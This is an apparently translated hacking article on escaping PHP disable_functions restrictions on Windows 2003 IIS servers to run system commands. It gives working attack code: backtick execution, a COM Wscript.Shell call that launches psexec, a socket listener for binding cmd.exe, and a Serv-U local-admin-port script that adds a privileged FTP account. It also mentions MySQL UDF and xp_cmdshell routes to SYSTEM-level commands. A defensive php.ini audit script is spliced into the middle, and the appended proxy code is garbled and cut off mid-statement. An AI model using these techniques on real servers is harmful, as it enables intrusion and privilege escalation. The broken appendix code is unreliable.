A new way to break through Windows 2003 PHP server

Source: Internet
Author: User

From Windows 2000 to Windows XP and then to Windows 2003, the security of Microsoft's IIS servers has clearly improved. On Windows 2000, an ordinary PHP shell is enough to break in. On Windows XP, even with safe_mode = off you cannot execute system commands with functions such as system(), but the COM() function still offers a way through. On Windows 2003, even when both IIS and PHP are installed with default settings, system() and COM() may not get you anywhere, so some new methods are needed to break through.

1. Getting past disable_functions

In versions above php-4.0.1, php.ini gained a directive, disable_functions, which is useful for disabling individual functions. For example, add disable_functions = passthru exec system popen to php.ini; any call to these functions then produces the warning "Warning: system() has been disabled for security reasons" and the program stops running. That does not mean there is no longer any way to execute system commands, however. PHP borrows many features from Perl, among them the backtick (`) operator for executing commands. Sample code:

<?php $output = `ls -al`; echo "<pre>$output</pre>"; ?>

It is said that this can only be avoided by enabling safe_mode, but the last time I used it on a foreign server, I failed; I am not always lucky.

2. Using the dl() function

When neither PHP's built-in command-execution functions nor the backtick operator is available, you can try dl(). It can only be used with safe_mode=off, because it is disabled in safe mode. With dl() you can call W32API functions directly, but this extension has been moved to the PECL repository and is no longer bundled as of PHP 5.1.0. Here is the example from the manual:

<?php
// Load the extension
dl("php_w32api.dll");
// Register the GetTickCount function from kernel32.dll
w32api_register_function("kernel32.dll",
                         "GetTickCount",
                         "long");
// Register the MessageBoxA function from User32.dll
w32api_register_function("User32.dll",
                         "MessageBoxA",
                         "long");
// Get uptime information
$ticks = GetTickCount();
// Convert it to text that is easy to read
$secs = floor($ticks / 1000);
$mins = floor($secs / 60);
$hours = floor($mins / 60);
$str = sprintf("You have been using your computer for:" .
               "\r\n %d Milliseconds, or \r\n %d Seconds" .
               "or \r\n %d mins or\r\n %d hours %d mins.",
               $ticks,
               $secs,
               $mins,
               $hours,
               $mins - ($hours * 60));
// Display a message box with only an OK button and the uptime text above
MessageBoxA(NULL,
            $str,
            "Uptime Information",
            MB_OK);
?>

Unfortunately, I have not yet fully understood dl() and W32API, so I will not give an example of my own, lest I mislead the reader.

3. Using the COM and .NET (Windows) functions

COM (Component Object Model) is a software specification developed by Microsoft for building object-oriented, compiled software components. It allows software to be abstracted into binary components and is used primarily on Windows platforms.

The Windows version of PHP has built-in support for this extension module, so COM functions can be used without loading any additional extension libraries. Usage resembles the syntax for creating classes in C++ or Java: the COM class name is passed to the constructor as an argument. For example, invoking "Wscript.Shell" from PHP to execute system commands:

<?php
$cmd = "E:/cert/admin/psexec.exe";
if ($com = new COM("Wscript.Shell")) echo "Yes";
if (!$cmd1 = $com->exec($cmd))
{
    echo "Can not exec()";
}
if (!$cmd2 = $cmd1->stdout())
{
    echo "Can not stdout()";
}
if (!$cmd3 = $cmd2->readall())
{
    echo "Can not readall()";
}
echo $cmd3;
?>

Figure 1 shows an example I wrote that executes psexec.exe.

This code works the same way as its ASP counterpart, and of course you can also call "ADODB.Connection" as in ASP. Combining this component with the Jet2 overflow vulnerability might make it possible to get a shell even with PHP safe_mode=on.

<?php
// Create the database connection
$conn = new COM("ADODB.Connection");
$dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
$conn->open($dsn);
// Pull the data through an SQL string
$rs = $conn->execute("Select Clients from Web");
.....
?>

The .NET functions run only on PHP 5 and of course need the .NET runtime. This PHP module is still experimental and its functionality is incomplete, so it is not discussed here.

4. Using the Java() function

This method works with safe_mode=on. To use the Java module, a Java virtual machine must already be installed on the server, and PHP must have been configured with the --with-java option at install time. The php.ini settings are as follows:

[Java]
; This is the path to php_java.jar
;java.class.path = .\php_java.jar
; Path to the JDK
;java.home = f:\jdk1.3.0
; Path to the virtual machine
;java.library = f:\jdk1.3.0\jre\bin\hotspot\jvm.dll

As with COM, creating Java classes (not only JavaBeans) just means passing the Java class name to the constructor as an argument. Here is an example from the manual:

<?php
// This example is only intended to be run as a CGI.
$frame = new Java('java.awt.Frame', 'PHP');
$button = new Java('java.awt.Button', 'Hello Java World!');
$frame->add('North', $button);
$frame->validate();
$frame->pack();
$frame->visible = True;
$thread = new Java('java.lang.Thread');
$thread->sleep(10000);
$frame->dispose();
?>

Unfortunately, PHP servers with Java enabled are rare, so this is not discussed further here.

5. Using the socket() functions

The socket module is very powerful in PHP. If you only use the high-level, abstract interface (sockets opened with fsockopen() and pfsockopen()), you do not need to enable php_sockets.dll. To use the complete set of socket functions, however, you must set the following in php.ini:

; Windows Extensions
; Note that MySQL and ODBC support is now built in, so no dll is needed for it.
........
; Remove the leading semicolon from the following line
;extension=php_sockets.dll

With PHP's socket functions you can implement port forwarding/redirection, packet sniffing, local overflow and other functions; most of what nc can do, it can do too. It can also be used to build TCP/UDP servers, and I think it is also the best way to break through a server's security policy. Below is an example of a TCP server that opens a port on the server; you can use it to bind the server's cmd.exe:

<?php
// Build a TCP service on the server
// This example requires php_sockets.dll
// After running it, connect with: telnet 127.0.0.1 1020
error_reporting(E_ALL);
/* Allow the script to hang around waiting for connections. */
set_time_limit(0);
/* Turn on implicit output flushing so we see what we're getting
 * as it comes in. */
ob_implicit_flush();
// IP address and port to bind on the server
$address = '127.0.0.1';
$port = 1020;
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
    echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
}
if (($ret = socket_bind($sock, $address, $port)) < 0) {
    echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}
if (($ret = socket_listen($sock, 5)) < 0) {
    echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
}
do {
    if (($msgsock = socket_accept($sock)) < 0) {
        echo "socket_accept() failed: reason: " . socket_strerror($msgsock) . "\n";
        break;
    }
    /* Send instructions. */
    $msg = "\nWelcome to the PHP Test Server. \n" .
           "To quit, type 'quit'. To shut down the server type 'shutdown'.\n";
    socket_write($msgsock, $msg, strlen($msg));
    do {
        if (false === socket_recv($msgsock, $buf, 1024, 0)) {
            echo "socket_read() failed: reason: " . socket_strerror($ret) . "\n";
            break 2;
        }
        if (!$buf = trim($buf)) {
            continue;
        }
        if ($buf == 'quit') {
            break;
        }
        if ($buf == 'shutdown') {
            socket_close($msgsock);
            break 2;
        }
        $talkback = "PHP: You said '$buf'.\n";
        socket_write($msgsock, $talkback, strlen($talkback));
        echo "$buf\n";
        // Process the received $buf below
        /* e.g.:
        $buf = "cmd.exe /c netstat -an";
        $pp = popen($buf, 'r');
        while ($read = fgets($pp, 2096))
            echo $read;
        pclose($pp);
        */
    } while (true);
    socket_close($msgsock);
} while (true);
socket_close($sock);
?>

In practice, many hosts do not load php_sockets.dll. Fortunately, the fsockopen() function, which does not need the sockets module, is enough for our purposes. As long as fsockopen() is available, we can freely read from and write to ports on this machine that are not open to the outside. Using fsockopen() to read and write the Serv-U local administration port 43958 (note: this port cannot be connected to from outside) is a typical example:

<?php
$adminuser = "Localadministrator";
$adminpass = "#l @ $ak #.lk;0@p";
$adminport = "43958";
$fp = fsockopen("127.0.0.1", $adminport, $errno, $errstr, 8);
if (!$fp) {
    echo "$errstr ($errno)\n";
} else {
    // $shellcode can be written here
    fputs($fp, $shellcode);
    fputs($fp, "USER " . $adminuser . "\r\n");
    sleep(1);
    fputs($fp, "Pass " . $adminpass . "\r\n");
    sleep(1);
    fputs($fp, "SITE maintenance\r\n");
    sleep(1);
    fputs($fp, "-setusersetup\r\n");
    fputs($fp, "-ip=" . $addr . "\r\n");
    fputs($fp, "-portno=" . $ftpport . "\r\n");
    fputs($fp, "-user=" . $user . "\r\n");
    fputs($fp, "-password=" . $password . "\r\n");
    fputs($fp, "-homedir=" . $homedir . "\r\n");
    fputs($fp, "-loginmesfile=\r\n");
    fputs($fp, "-disable=0\r\n");
    fputs($fp, "-relpaths=0\r\n");
    fputs($fp, "-needsecure=0\r\n");
    fputs($fp, "-hidehidden=0\r\n");
    fputs($fp, "-alwaysallowlogin=0\r\n");
    fputs($fp, "-changepassword=1\r\n");
    fputs($fp, "-quotaenable=0\r\n");
    fputs($fp, "-maxusersloginperip=-1\r\n");
    fputs($fp, "-speedlimitup=-1\r\n");
    fputs($fp, "-speedlimitdown=-1\r\n");
    fputs($fp, "-maxnrusers=-1\r\n");
    fputs($fp, "-idletimeout=600\r\n");
    fputs($fp, "-sessiontimeout=-1\r\n");
    fputs($fp, "-expire=0\r\n");
    fputs($fp, "-ratioup=1\r\n");
    fputs($fp, "-ratiodown=1\r\n");
    fputs($fp, "-ratioscredit=0\r\n");
    fputs($fp, "-quotacurrent=0\r\n");
    fputs($fp, "-quotamaximum=0\r\n");
    fputs($fp, "-maintenance=system\r\n");
    fputs($fp, "-passwordtype=regular\r\n");
    fputs($fp, "-ratios=none\r\n");
    fputs($fp, "access=" . $homedir . "|Rwamelcdp\r\n");
    fputs($fp, "quit\r\n");
    sleep(1);
    while (!feof($fp)) {
        echo fgets($fp, 128);
    }
}
?>

You can also use fsockopen() to write an HTTP proxy, giving access to web sites on the external network or on this machine that are not reachable from outside. I have a complete HTTP proxy (Figure 4); the code is long, and interested readers can take a look.

6. The MySQL/MSSQL interface

Unlike on Linux, MySQL and MSSQL on Windows generally run as a system administrator, so as long as you can obtain the root/sa password of the local SQL database, you can connect to the database directly from PHP and execute system commands.

Executing system commands through MySQL takes advantage of the user-defined function vulnerability "MySQL UDF Dynamic Library". In MSSQL, once connected to the database, you can call the "master..xp_cmdshell" extended stored procedure directly, and the privileges are of course SYSTEM privileges.

To sum up: because the system, IIS and PHP versions differ, the methods described above may change. PHP offers many extensions, and apart from system() and the few other command-execution functions, you may still be able to get past the system's security policy restrictions.
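A defender's check for the settings sections 1 to 5 depend on, as an added example that is not part of the original article: it parses php.ini text and lists which of those techniques the configuration still leaves available. The sample php.ini is constructed, the names `parse_ini`, `names` and `audit` are this example's own, and it assumes `disable_classes` is honoured for the COM class on the build in use.

```python
import re

# Process-spawning functions. The backtick operator is shell_exec() under a
# different syntax, so it stays usable unless shell_exec is listed.
EXEC_FUNCS = {"system", "exec", "passthru", "shell_exec", "popen", "proc_open"}
# Functions behind sections 2 and 5 of the article.
OTHER_FUNCS = {"dl", "fsockopen", "pfsockopen"}
# Extension DLLs behind sections 2, 4 and 5.
RISKY_EXT = {"php_w32api.dll", "php_java.dll", "php_sockets.dll"}

# Constructed sample: the article's disable_functions line plus one extension.
SAMPLE_INI = """\
[PHP]
safe_mode = Off
disable_functions = passthru exec system popen
;extension=php_java.dll
extension=php_sockets.dll
"""

def parse_ini(text):
    """Return (directives, extensions); ';' comments and [sections] are skipped."""
    directives, extensions = {}, []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip().strip('"') for part in line.split("=", 1))
        if key.lower() == "extension":
            extensions.append(value.lower())
        else:
            directives[key.lower()] = value
    return directives, extensions

def names(directives, key):
    """PHP splits disable_functions / disable_classes on commas and spaces."""
    return {n.lower() for n in re.split(r"[,\s]+", directives.get(key, "")) if n}

def audit(text):
    """List the article's techniques that this php.ini leaves available."""
    directives, extensions = parse_ini(text)
    open_funcs = (EXEC_FUNCS | OTHER_FUNCS) - names(directives, "disable_functions")
    findings = ["function not disabled: " + f for f in sorted(open_funcs)]
    if directives.get("enable_dl", "1").lower() in ("1", "on", "true", "yes"):
        findings.append("enable_dl is on (the default): dl() can load extensions")
    # Assumption: disable_classes covers the COM class on this PHP build.
    if "com" not in names(directives, "disable_classes"):
        findings.append("class not disabled: COM")
    findings += ["extension loaded: " + e for e in extensions if e in RISKY_EXT]
    return findings
```

Run against the article's own `disable_functions` line, the audit reports `shell_exec` as still enabled, which is why the backtick operator in section 1 keeps working.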

Appendix: proxy.php code.

<?php
error_reporting(E_ALL);
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
//
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
//
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
//-------------------------------------------------------------------
Class: PHProxy
Author: ultimategamer00 (Abdullah A.)
Last modified: 6:28 PM 6/22/2004
*/
function __stripslashes($str)
{
    return get_magic_quotes_gpc() ? stripslashes($str) : $str;
}
if (!function_exists('str_rot13'))
{
    function str_rot13($str)
    {
        static $alpha = array('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ',
                              'nopqrstuvwxyzabcdefghijklmNOPQRSTUVWXYZABCDEFGHIJKLM');
        return strtr($str, $alpha[0], $alpha[1]);
    }
}
class PHProxy
{
    var $allowed_hosts = array();
    var $version;
    var $script_url;
    var $url;
    var $url_segments;
    var $flags = array('include_form' => 1, 'remove_scripts' => 1, 'accept_cookies' => 1, 'show_images' => 1, 'show_referer' => 1);
    var $socket;
    var $content_type;
    var $request_headers;
    var $post_body;
    var $response_headers;
    var $response_body;
    function PHProxy($flags = 'previous')
    {
        $this->version = '0.2';
        $this->script_url = 'http'
        . (isset(
    function set_request_headers()
    {
        $headers = "" . (isset($this->url_segments['query']) ? "?" : '') . "HTTP/1.0\r\n";
        $headers .= "Host: :\r\n";
        $headers .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
        $headers .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\r\n";
        $headers .= "Connection: close\r\n";
        if ($this->flags['show_referer'] == 1)
        {
            $headers .= "Referer: \r\n";
        }
        $cookies = $this->get_cookies();
        $headers .= $cookies != '' ? "Cookie: $cookies\r\n" : '';
        if (
